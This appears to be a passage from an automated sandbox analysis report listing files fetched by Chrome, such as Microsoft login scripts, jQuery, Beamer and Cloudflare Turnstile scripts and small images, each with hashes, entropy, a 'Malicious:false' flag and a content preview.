                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_cc2c59f5ef2c09e14b08.js
                                                                                                                                                                                                                Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):89500
                                                                                                                                                                                                                Entropy (8bit):5.28977521478275
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1vN:DIh8GgP3hujzwbhd3XvSiDQ47GK/
                                                                                                                                                                                                                MD5:7C14A783DFEB3D238CCD3EDD840D82EE
                                                                                                                                                                                                                SHA1:AD886E472B3557F3DC7DFA2BC43468AB8D1CEF5B
                                                                                                                                                                                                                SHA-256:80F04717F32EA0320C5E8618FBACEDD1FEE3A8775AD8292140A6113551D4B5B0
                                                                                                                                                                                                                SHA-512:FA3E021CA60A9ADBE570C6565C7370727904C4396C23A4C519DAF258D05FAE3E17BFB7607A0AB6DFE2B7150A4EC1B6A95E6D49675291BE5F6A4E5679AD78D858
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://app.getbeamer.com/js/jquery/jquery-3.6.0.min.js
                                                                                                                                                                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):673
                                                                                                                                                                                                                Entropy (8bit):7.6596900876595075
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                                                                                                                                MD5:0E176276362B94279A4492511BFCBD98
                                                                                                                                                                                                                SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                                                                                                                                SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                                                                                                                                SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1608
                                                                                                                                                                                                                Entropy (8bit):5.2658318815692535
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:cKAXQSfUcJGHPd5G+NwRHWdouz8HenITnO553WAv:CXQSfUAGHPd5XcWdiHSkO55Rv
                                                                                                                                                                                                                MD5:4D37ABB9B4EB9A748B19943F2CA07C4E
                                                                                                                                                                                                                SHA1:DF596C72A9DC38FE9BF3788EDC31FE63CE532751
                                                                                                                                                                                                                SHA-256:624BA448758F813C0B4A1271BCB3043DDF0E59911916C331744854E997B3827B
                                                                                                                                                                                                                SHA-512:192A760CF55BF90351314DC7CB016245F4E866C30F748C10C88B17E8E21136EF6C1F745AA2C81C61CDEF8EFF563EA2B80940E6824FE09563DDDF1B56C76A8B0B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 16.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">..<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... width="100px" height="100px" viewBox="0 0 100 100" enable-background="new 0 0 100 100" xml:space="preserve">..<g>...<g>....<path fill="#FFFFFF" d="M10.874,85.257c-2.632,0-5.129-1.551-6.193-4.119c-1.409-3.396,0.223-7.283,3.642-8.681l78.254-32.006.....c3.419-1.397,7.334,0.221,8.743,3.617c1.408,3.398-0.225,7.284-3.643,8.682L13.421,84.754.....C12.588,85.095,11.723,85.257,10.874,85.257z"/>...</g>...<g>....<path fill="#FFFFFF" d="M10.874,59.904c-2.632,0-5.129-1.55-6.193-4.121c-1.409-3.398,0.223-7.284,3.642-8.682l78.254-32.005.....c3.419-1.398,7.334,0.223,8.743,3.617c1.408,3.396-0.225,7.283-3.643,8.682L13.421,59.399.....C12.588,59.742
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):3620
                                                                                                                                                                                                                Entropy (8bit):6.867828878374734
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                                                                                                                                MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                                                                                                                SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                                                                                                                SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                                                                                                                SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                                                                                                                                                                Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:PNG image data, 5 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                Entropy (8bit):4.035372245524405
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:yionv//thPlgflQgol/hBxl/k4E08up:6v/lhP+yd7Tp
                                                                                                                                                                                                                MD5:201D2812095A4039CEA4F5AF12775DE1
                                                                                                                                                                                                                SHA1:13D7CC808DC52ED0B9F00715EED84B47E0037314
                                                                                                                                                                                                                SHA-256:22DA52E01C4AE64A2AA45D242D8BA4F3137BF3464E8AB141EC9386875053469F
                                                                                                                                                                                                                SHA-512:60B687164BCEF78B4512D153CF7D087943862FB25F4BD63BC2F26703E2881B14FA88FB6A723F3A44635A6EA42C925CA8B7B2FD1E85594B6EBA94BEAF0BF37B78
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/d/905a5214bea60fa5/1737494138722/9f3y4b8VlM8-_kF
                                                                                                                                                                                                                Preview:.PNG........IHDR..............E......IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (472)
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):2166
                                                                                                                                                                                                                Entropy (8bit):4.836717236754267
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:3t1HX0+Inj/RCBxw48fkw3lMAw3owazFpECntf3dECW7fbNn:3jdInj/RCBxwnZMQwazFBc
                                                                                                                                                                                                                MD5:C935F9609EA3531B7A5B64FFB104C7C7
                                                                                                                                                                                                                SHA1:9006B437D72693FD95390C8ADDDD4B9FC574DA59
                                                                                                                                                                                                                SHA-256:E9F488B77347F77564789DA74FF2BEA03E779C0E9D4AFE320305E04821F83D75
                                                                                                                                                                                                                SHA-512:692AC8DA4D9E1B978A068E2A113995E61B6A33DBD37BBCB168CE4F4B703BBE54C4EBF62D493CFD2776650B9B653B78D686A182EFDEE71D19E900901E3B9C36E2
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://app.getbeamer.com/js/human.js?v=2
                                                                                                                                                                                                                Preview:"undefined"===typeof window.HumanJS&&(window.HumanJS={});HumanJS.score=0;HumanJS.init=function(a){HumanJS.callback=a;HumanJS.initMouseListener(HumanJS.incrementScoreLight);HumanJS.initTouchmoveListener(HumanJS.incrementScoreLight);HumanJS.initTouchClickListener(HumanJS.incrementScoreLight);HumanJS.initMouseClickListener(HumanJS.incrementScoreHigh);HumanJS.initKeyboardListener(HumanJS.incrementScoreHigh);HumanJS.initScrollListener(HumanJS.incrementScoreHigh)};.HumanJS.pause=function(a){HumanJS.removeMouseListener(HumanJS.incrementScoreLight);HumanJS.removeKeyboardListener(HumanJS.incrementScoreHigh);HumanJS.removeMouseClickListener(HumanJS.incrementScoreHigh);HumanJS.removeScrollListener(HumanJS.incrementScoreHigh);0<a&&setTimeout(function(){return HumanJS.init(HumanJS.callback)},a)};HumanJS.incrementScoreLight=function(){HumanJS.pause(200);HumanJS.score+=1;HumanJS.callback&&HumanJS.callback(HumanJS.score)};.HumanJS.incrementScoreHigh=function(){HumanJS.pause(200);HumanJS.score+=5;Human
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):17174
                                                                                                                                                                                                                Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (48120)
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):48121
                                                                                                                                                                                                                Entropy (8bit):5.399559475473033
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:1CbU/4ruPh5qaq75KvO8fV9/KFHk7z6ybMJhTBsgVX2GwDBsjY1L8ep7K1oiSJvU:QruPh5qaq7gGwV9ygWyb42GQsp
                                                                                                                                                                                                                MD5:240198B7133FAF43160703113AA2F601
                                                                                                                                                                                                                SHA1:AB61FEDDAE321268BD84839B8908E611E9300AFD
                                                                                                                                                                                                                SHA-256:401258036014BCC401F7894FD5ACC7D6BA31CDF3162C1D55EBB219D908BCF496
                                                                                                                                                                                                                SHA-512:F49972AE131DE7EE33D86472471237580A1055C2E086BE0266E7171CB9C423A99145B006CF5D25E25288E64440430E43782E976BF7EC117BDAA52E5D370AB139
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://challenges.cloudflare.com/turnstile/v0/g/672eb098a9f3/api.js
                                                                                                                                                                                                                Preview:"use strict";(function(){function Bt(e,t,a,o,c,l,g){try{var h=e[l](g),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function jt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function g(s){Bt(l,o,c,g,h,"next",s)}function h(s){Bt(l,o,c,g,h,"throw",s)}g(void 0)})}}function D(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):D(e,t)}function Ue(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function De(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t